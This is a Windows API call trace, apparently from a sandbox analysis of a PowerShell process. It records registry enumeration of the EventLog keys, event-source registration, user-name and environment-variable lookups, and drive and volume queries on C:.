	[0299.394] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x0, lpName=0x383920, lpcchName=0x1ad268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ad268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.394] CoTaskMemFree (pv=0x383920) 
	[0299.394] CoTaskMemFree (pv=0x0) 
	[0299.394] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.394] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x1, lpName=0x383920, lpcchName=0x1ad268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ad268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.394] CoTaskMemFree (pv=0x383920) 
	[0299.394] CoTaskMemFree (pv=0x0) 
	[0299.394] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.394] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x2, lpName=0x383920, lpcchName=0x1ad268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ad268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.394] CoTaskMemFree (pv=0x383920) 
	[0299.394] CoTaskMemFree (pv=0x0) 
	[0299.394] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.394] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x3, lpName=0x383920, lpcchName=0x1ad268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ad268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.394] CoTaskMemFree (pv=0x383920) 
	[0299.394] CoTaskMemFree (pv=0x0) 
	[0299.394] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.394] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x4, lpName=0x383920, lpcchName=0x1ad268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ad268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.394] CoTaskMemFree (pv=0x383920) 
	[0299.394] CoTaskMemFree (pv=0x0) 
	[0299.394] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.394] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x5, lpName=0x383920, lpcchName=0x1ad268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ad268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.394] CoTaskMemFree (pv=0x383920) 
	[0299.394] CoTaskMemFree (pv=0x0) 
	[0299.394] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.394] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x6, lpName=0x383920, lpcchName=0x1ad268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ad268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.394] CoTaskMemFree (pv=0x383920) 
	[0299.394] CoTaskMemFree (pv=0x0) 
	[0299.394] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.394] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x7, lpName=0x383920, lpcchName=0x1ad268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ad268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.395] CoTaskMemFree (pv=0x383920) 
	[0299.395] CoTaskMemFree (pv=0x0) 
	[0299.395] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.395] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x8, lpName=0x383920, lpcchName=0x1ad268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ad268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.395] CoTaskMemFree (pv=0x383920) 
	[0299.395] CoTaskMemFree (pv=0x0) 
	[0299.395] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x350) returned 0x0
	[0299.395] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x0) returned 0x2
	[0299.395] RegOpenKeyExW (in: hKey=0x374, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x378) returned 0x0
	[0299.395] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x0) returned 0x2
	[0299.395] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x37c) returned 0x0
	[0299.395] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x0) returned 0x2
	[0299.395] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x380) returned 0x0
	[0299.396] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x0) returned 0x2
	[0299.396] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x384) returned 0x0
	[0299.396] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x0) returned 0x2
	[0299.396] RegOpenKeyExW (in: hKey=0x374, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x388) returned 0x0
	[0299.396] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x0) returned 0x2
	[0299.396] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x38c) returned 0x0
	[0299.396] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x0) returned 0x2
	[0299.396] RegOpenKeyExW (in: hKey=0x374, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x390) returned 0x0
	[0299.396] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x0) returned 0x2
	[0299.396] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x394) returned 0x0
	[0299.396] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x398) returned 0x0
	[0299.397] RegCloseKey (hKey=0x398) returned 0x0
	[0299.397] RegCloseKey (hKey=0x374) returned 0x0
	[0299.397] RegCloseKey (hKey=0x394) returned 0x0
	[0299.398] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad238 | out: phkResult=0x1ad238*=0x394) returned 0x0
	[0299.398] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad1ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad1a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad1ac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad1a8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.398] CoTaskMemFree (pv=0x0) 
	[0299.398] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.398] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x0, lpName=0x383920, lpcchName=0x1ad238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ad238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.398] CoTaskMemFree (pv=0x383920) 
	[0299.398] CoTaskMemFree (pv=0x0) 
	[0299.398] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.398] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1, lpName=0x383920, lpcchName=0x1ad238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ad238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.398] CoTaskMemFree (pv=0x383920) 
	[0299.398] CoTaskMemFree (pv=0x0) 
	[0299.398] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.398] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2, lpName=0x383920, lpcchName=0x1ad238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ad238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.398] CoTaskMemFree (pv=0x383920) 
	[0299.398] CoTaskMemFree (pv=0x0) 
	[0299.398] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.398] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x3, lpName=0x383920, lpcchName=0x1ad238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ad238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.398] CoTaskMemFree (pv=0x383920) 
	[0299.398] CoTaskMemFree (pv=0x0) 
	[0299.398] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.398] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x4, lpName=0x383920, lpcchName=0x1ad238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ad238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.399] CoTaskMemFree (pv=0x383920) 
	[0299.399] CoTaskMemFree (pv=0x0) 
	[0299.399] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.399] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x5, lpName=0x383920, lpcchName=0x1ad238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ad238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.399] CoTaskMemFree (pv=0x383920) 
	[0299.399] CoTaskMemFree (pv=0x0) 
	[0299.399] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.399] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x6, lpName=0x383920, lpcchName=0x1ad238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ad238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.399] CoTaskMemFree (pv=0x383920) 
	[0299.399] CoTaskMemFree (pv=0x0) 
	[0299.399] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.399] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x7, lpName=0x383920, lpcchName=0x1ad238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ad238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.399] CoTaskMemFree (pv=0x383920) 
	[0299.399] CoTaskMemFree (pv=0x0) 
	[0299.399] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.399] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x8, lpName=0x383920, lpcchName=0x1ad238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ad238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.399] CoTaskMemFree (pv=0x383920) 
	[0299.399] CoTaskMemFree (pv=0x0) 
	[0299.399] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad298 | out: phkResult=0x1ad298*=0x374) returned 0x0
	[0299.399] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad298 | out: phkResult=0x1ad298*=0x0) returned 0x2
	[0299.399] RegOpenKeyExW (in: hKey=0x394, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad298 | out: phkResult=0x1ad298*=0x398) returned 0x0
	[0299.399] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad298 | out: phkResult=0x1ad298*=0x0) returned 0x2
	[0299.400] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad298 | out: phkResult=0x1ad298*=0x39c) returned 0x0
	[0299.400] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad298 | out: phkResult=0x1ad298*=0x0) returned 0x2
	[0299.400] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad298 | out: phkResult=0x1ad298*=0x3a0) returned 0x0
	[0299.400] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad298 | out: phkResult=0x1ad298*=0x0) returned 0x2
	[0299.400] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad298 | out: phkResult=0x1ad298*=0x3a4) returned 0x0
	[0299.400] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad298 | out: phkResult=0x1ad298*=0x0) returned 0x2
	[0299.400] RegOpenKeyExW (in: hKey=0x394, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad298 | out: phkResult=0x1ad298*=0x3a8) returned 0x0
	[0299.400] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad298 | out: phkResult=0x1ad298*=0x0) returned 0x2
	[0299.400] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad298 | out: phkResult=0x1ad298*=0x3ac) returned 0x0
	[0299.400] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad298 | out: phkResult=0x1ad298*=0x0) returned 0x2
	[0299.400] RegOpenKeyExW (in: hKey=0x394, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad298 | out: phkResult=0x1ad298*=0x3b0) returned 0x0
	[0299.401] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad298 | out: phkResult=0x1ad298*=0x0) returned 0x2
	[0299.401] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad298 | out: phkResult=0x1ad298*=0x3b4) returned 0x0
	[0299.401] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad298 | out: phkResult=0x1ad298*=0x3b8) returned 0x0
	[0299.401] RegCloseKey (hKey=0x3b8) returned 0x0
	[0299.401] RegCloseKey (hKey=0x394) returned 0x0
	[0299.401] RegCloseKey (hKey=0x3b4) returned 0x0
	[0299.405] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b8d0008
	[0299.931] ReportEventW (hEventLog=0x1b8d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34a7390*="WSMan", lpRawData=0x34a7100) returned 1
	[0299.932] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0299.932] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0299.932] CoTaskMemFree (pv=0x3298d0) 
	[0299.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0299.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0299.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0299.934] CoTaskMemAlloc (cb=0x804) returned 0x1b7022f0
	[0299.934] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7022f0, nSize=0x1ad528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad528) returned 0x1
	[0299.935] CoTaskMemFree (pv=0x1b7022f0) 
	[0299.935] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.935] GetUserNameW (in: lpBuffer=0x383920, pcbBuffer=0x1ad568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad568) returned 1
	[0299.935] CoTaskMemFree (pv=0x383920) 
	[0299.935] ReportEventW (hEventLog=0x1b8d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34ac8c8*="Alias", lpRawData=0x34ac658) returned 1
	[0299.937] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0299.937] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0299.937] CoTaskMemFree (pv=0x3298d0) 
	[0299.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0299.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0299.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0299.939] CoTaskMemAlloc (cb=0x804) returned 0x1b7022f0
	[0299.939] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7022f0, nSize=0x1ad528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad528) returned 0x1
	[0299.939] CoTaskMemFree (pv=0x1b7022f0) 
	[0299.939] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.939] GetUserNameW (in: lpBuffer=0x383920, pcbBuffer=0x1ad568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad568) returned 1
	[0299.939] CoTaskMemFree (pv=0x383920) 
	[0299.940] ReportEventW (hEventLog=0x1b8d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34b1ec0*="Environment", lpRawData=0x34b1c50) returned 1
	[0299.941] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0299.941] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0299.941] CoTaskMemFree (pv=0x3298d0) 
	[0299.942] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0299.942] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0299.943] CoTaskMemFree (pv=0x3298d0) 
	[0299.943] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0299.943] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0299.943] CoTaskMemFree (pv=0x3298d0) 
	[0299.943] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1ad0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0299.943] SetErrorMode (uMode=0x1) returned 0x1
	[0299.943] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1ad2e0 | out: lpFileInformation=0x1ad2e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0299.943] SetErrorMode (uMode=0x1) returned 0x1
	[0299.945] GetLogicalDrives () returned 0x4
	[0299.945] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ace40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0299.946] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0299.946] SetErrorMode (uMode=0x1) returned 0x1
	[0299.947] CoTaskMemAlloc (cb=0x68) returned 0x1b6eacf0
	[0299.947] CoTaskMemAlloc (cb=0x68) returned 0x1b6ea900
	[0299.947] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b6eacf0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1ad2b0, lpMaximumComponentLength=0x1ad2ac, lpFileSystemFlags=0x1ad2a8, lpFileSystemNameBuffer=0x1b6ea900, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ad2b0*=0x9c354b42, lpMaximumComponentLength=0x1ad2ac*=0xff, lpFileSystemFlags=0x1ad2a8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0299.948] CoTaskMemFree (pv=0x1b6eacf0) 
	[0299.948] CoTaskMemFree (pv=0x1b6ea900) 
	[0299.948] SetErrorMode (uMode=0x1) returned 0x1
	[0299.948] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0299.949] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acff0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0299.949] SetErrorMode (uMode=0x1) returned 0x1
	[0299.949] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad250 | out: lpFileInformation=0x1ad250*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0299.949] SetErrorMode (uMode=0x1) returned 0x1
	[0299.949] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acff0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0299.949] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1acea0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0299.950] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0299.950] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1acdd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0299.950] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0299.951] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ace20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0299.951] SetErrorMode (uMode=0x1) returned 0x1
	[0299.951] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad080 | out: lpFileInformation=0x1ad080*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0299.951] SetErrorMode (uMode=0x1) returned 0x1
	[0299.951] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ace20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0299.951] SetErrorMode (uMode=0x1) returned 0x1
